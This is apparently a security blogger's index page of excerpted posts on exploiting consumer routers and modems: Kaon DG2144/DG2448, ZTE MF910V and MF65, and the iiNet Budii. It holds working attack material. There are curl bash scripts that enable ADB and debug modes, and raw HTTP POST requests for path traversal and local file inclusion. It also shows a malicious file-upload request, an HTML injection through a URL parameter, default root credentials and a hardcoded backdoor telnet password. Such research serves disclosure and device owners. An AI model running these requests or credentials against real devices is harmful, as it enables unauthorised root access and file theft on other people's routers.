Posts

Kaon DG2144 Exploit: Root Command Injection (& How To Enable SSH)

Command Injection Vulnerability in Kaon DG2448 & DG2144 Modems
Published on 7/30/24 3:17 PM

Introduction: In this post, I'll be sharing my findings on a critical command injection vulnerability I discovered in the Kaon DG2448 and Kaon DG2144 modems. The vulnerability is a severe flaw that allows attackers to execute arbitrary commands with root privileges through the modems' web interface. I will explain the details of how the exploit works, the potential impact, and how users and organizations can protect themselves.

The Vulnerability Overview: Upon analyzing the modems' web service, I found that several diagnostic functions are vulnerable to command injection. These functions include: Ping (under Diagnostics Tab), Traceroute (under Diagnostics Tab), NsLookup (under Diagn...

Telstra ZteMF910/v Exploit Scripts

To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB: To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

#!/bin/bash
# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" "$MODE_SWITCH_URL"
# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_pr...

ZTE MF910V Root exploit

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v

This guide exists in both Linux and Windows format. Please follow the instructions as per O/S or until the instructions converge.
|+++++++++++++++++++++++++++++++++++++|
Default credentials:
For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v
root:oelinux123
Web Interface Password: password
|+++++++++++++++++++++++++++++++++++++|
Getting Setup:
Download the mode switch html to run locally: http://lopoteam.com/3AY9
Also ensure you have ADB (Android Debug Bridge) installed on your computer:
ADB:
Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw
Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac
|+++++++++++++++++++++++++++++++++++++|
Let's Begin
|+++++++++++++++++++++++++++++++++++++|
Plug your device into the computer to download drivers.
Linux: Open Terminal
cd ...

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug

AT mode: /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X
Change X to either 0 or 1; this enables and disables the Qualcomm services.
Debug / ADB: /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X
Change X to be the value matching the desired mode: 1-4 is RNDIS, 5 is CDC, 6 is ADB.
Alternatively, this page can be uploaded to any web dir: UPDATED (2017) Download this file: tools.html. Upload it to any directory and use it to switch through the modes via html.

ZTE MF910V LFI : HTTPshare exploit

Telstra MF910V: passwords are base64 encoded.
The config file has the SD card function turned off in the basic state:
SD_CARD_SUPPORT: true or false
mf910v SD_BASE_PATH: /
from mf65:
/*** SD card root directory @attribute {String} SD_BASE_PATH */
SD_BASE_PATH: '/mmc2', change to '/'
Menus relating to httpshare are stripped out of (webs)/js/config/menu.js; in this file the following functions are commented out:
#httpshare_guest
#sd (sets the menu item up again)
#sdcard (settings part for sd card menu)
#httpshare (file viewer for sd card menu)
By uncommenting these we can enable the sdcard function again. We also need to change the pre path in the httpshare.js file; we will change this to '/mmc2':
/**
 * Prefix path; some devices were found to show the SD card data in the web directory
 * @attribute {String} prePath
 * @example
 * prePath = "/usr/zte/zte_conf/web";
 */
var prePath = "/mmc2";// "/usr/zte/zte_conf/web";
then use the commands...

///ZTE mf65 Mode Switch(Updated)///

This page is uploaded to any web dir: UPDATED (2017) Download this file: mode.html. Upload it to any directory and use it to switch through the modes via html.
Modes:
factory_mode: Download Mode (DIAG+AT+MODEM)
debug_mode: Debug Mode (RNDIS+DIAG+AT+MODEM)
work_mode: Work Mode (RNDIS)
1. After you have selected and applied the switch, check the page title for status, then refresh!
To return to default mode, send AT+ZCDRUN=9 then AT+ZCDRUN=F to COM(X) ZTE NMEA Device.

///////ZTE MF65 -- Unlocking A Few More features (Fastboot)

/mf65_efs/Secondary/web/js/config/ufi/mf65/menu.js or /js/config/ufi/mf65/menu.js
By changing the file that controls the menus we can enable/disable a few more options like:
((#phonebook)) #group_common #group_family #group_friend #group_colleague
((#status)) #STK #traffic_alert #USSD
((#Wifi_setting)) #ap_station
((#device_setting)) #update_management #dlna_setting #fastboot
((#firewall)) #port_filter #port_forward #port_map #system_security #dmz #upnp
We simply remove the commenting out and re-upload the file, and this will enable any function that has been left out; use/see the previous methods for ways to do this if unsure.
[extra note] This file can also be used to disable the httpshare for guests. This file can be used to either strengthen or weaken a router's structure and presentation to anyone able to access ...

iiNet Budii(1031) (Telnet Access)(With Username and Password)

So telnet was always another open port available to us from the network, although it never responded to any login attempts even if we 100% knew the password and user were correct. This was solvable by one of two approaches.
(1) The easiest by far was to simply grab the consumer release of the firmware; inside its folders is a compilable C file for telnet (they've named it telnetc):
Budii1016_consumer_release/bcm963xx_4.12L.01_consumer/userspace/gpl/apps/telnetc
This is a pretty basic busybox telnet file; a few modifications have been made over the years, one of which includes this little function:
    telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");
    addr.s_addr = inet_addr("10.1.1.1");
    telnet_data_set_serverinfo(&g_telnet_data, &addr, 23);
meaning that iismshamswii will work as the username with i20U18r4E3 as the password ...

//////ZTE MF65 -- EFS acess method / partial Fs dump

In the last mf65 post we covered the local file listing method and briefly touched on the changes to the config file for constant file listing for the sd card functions. I managed to soft brick my device by directory traversal on the sd card base path: basically the router would try and load the httpshare page, get to the share path and sd base path, ultimately just reading /mmc2/../, and it would just freak out and not load, so it sat around for a while. Now I'm back and have a solution that fixes my problem and gives us access to the internal files. We will need a Windows machine (XP++), QPST, the modem drivers and PuTTY (ZTE WCDMA technologies MSM issue ??) (if you cannot find the drivers keep looking, they are around; try the dcunlocker support files (I had to try several drivers before my machine acknowledged them)). Using: /goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY ...

iiNet Budii(1031) Local File Listing (USBwebserver)

This is a method to list the local files on the router via wftp (USBwebserver). Requires login and a USB drive inserted into the aux USB ports (FAT/NTFS) (*1).
Either go to: http://10.1.1.1/usb_wftp_server.html
Or: http://10.1.1.1/websrv_cfg.cmd?action=save&wftp_enable=1&wftp_remote=0&port=8000&path=*&partitionindex=1&disk_index=0&disk_name=sdb (you may need to use the UI to turn this on)
to turn on the fileserver. Now point your browser here: http://10.1.1.1/usb_wftp_tree.cmd?diskname=..%2f..%2f (notice the URL encoding, because the straight traversal is rejected by the webserver, not even making its way to the app, but with encoded slashes we beat the checks) and click save. Now we go to: http://10.1.1.1:8000 and we see our router's internal files. We can wget out a copy of the system's memory with ...

iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find an internal USB; we can also see an Altera MAX JTAG breakout, a large set of GPIO pins and a UART breakout. Connecting to the UART and booting, we can see the modem is running a Broadcom firmware:
[bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
** Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
** Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]
The user names available to us are: (user:admin/password:admin) (user:user/password:user). Upon logging in we are brought into a console(d); the commands available to admin are:
[?.samp] help ...

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

Another super quick one, for an even better listing in the web application with the ability to change your path via the sd card settings. We use the exploit from last time to gain web app access to the web folder; this time though we have a little bit more work to do, so here we go from the start:
POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1

isTest=false&goformId=HTTPSHARE_AUTH_SET&HTTP_SHARE_STATUS=Enabled&HTTP_SHARE_WR_AUTH=readWrite&HTTP_SHARE_FILE=..%2Fweb%2F
Using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager; you will need to be logged in for this method. So your workflow is: login, send the request to change the path, logout, use the httpguest button to see the files. Now we will navigate to web/js/config/, then we will download the config.js file and change the line: SD_BASE_PATH: /mmc2/ to ...

/////ZTE MF65 -- local file listing method 2(LFLM )/////

Another super quick one, for a better listing in the web application:
POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1

isTest=false&goformId=HTTPSHARE_AUTH_SET&HTTP_SHARE_STATUS=Enabled&HTTP_SHARE_WR_AUTH=readWrite&HTTP_SHARE_FILE=..%2Fweb%2F
Using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager; you will need to be logged in for this method. So your workflow is: login, send the request to change the path, logout, use the httpguest button to see the files. This can be used to include files and to delete, create and rename files/folders. This method requires login, but other methods can work without a login. Till next time :)
FrankSxx

// Zte MF65 Local/Exec File Include //

## File Upload/Exec LFI ##
Hey, new one: a demonstration of web server executable includes. Use POST to send off this file; this file has our basic index re-uploaded without the service provider's logo. Use hijack.html to load the new file; it may fail, and it also may say it was a success without actually working. Use it with the lister bash script to check the /webs folder.
POST /cgi-bin/web/Hijack.html HTTP/1.1
Host: Your IP
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935
Content-Length: 10299

-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time"

2016-06-12 04:28:43
-----------------------------13738844281409151800268458935
Content-Disposition: form-data; name="path_SD_CARD_time_unix"

1465705724
----...

Mf65 File List/Rename/Delete Bash Scripts

Quick upload: these have (your.local.ip); change it to suit yours.
Bash script for file listings:
###################################
#!/bin/sh
echo "use ^c to exit"
echo "path"
read PARAM1
echo "page (please use 1 as default (10 r/s per page))"
read PARAM2
echo '     '
HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=$PARAM1&indexPage=$PARAM2"
curl "$HOST_PARAM"
echo '     '
echo "New Page Number? or 0 to go back."
read PARAM3
HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=$PARAM1&indexPage=$PARAM3"
curl "$HOST_PARAM"
echo ' '
echo "use ^c to exit"
echo "path"
read PARAM1
echo "page (please use 1 as default (10 r/s per page))...

///Zte MF65 local file listing/include exploits///

Hey guys, back again with another quickie but goodie. I've been searching for any traces of the internal filesystem of this router by every method of LFI I could think of, and I was lured to the http share page; this is the page used to upload files onto the sd card. It seems to be locked to the mmc2 path via the requests made; the paths are set in the httpshare files (off the top of my head they are in the tmpl/sd path and in the js path). The HTTP page uses a directory check to obtain a listing of the files in the said directory (mmc2); by changing the check queries we end up with a few local file listing includes and a few local file includes. We are using XML requests via your favourite request launcher (nc, curl, burp, whatevs), using:
POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.165.0.1
User-Agent: your own uA
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding...

ZTE(telstra)MF65 -Remote file include-

ZTE (telstra) MF65 Remote file include: this exploit uses http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd= and exploits the loose handling of closing html tags. Because the switchCmd page normally uses an unclosed <title> tag to write the switch command and return either success or fail in the page title, this lets us close the <title> and start a new tag. I found <xyz> worked as an arbitrary tag; this worked great (you could use anything in there), so we have: switchCmd=pagenamegoeshere</title><xyz> and using the img tag and span tags we get <img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this w...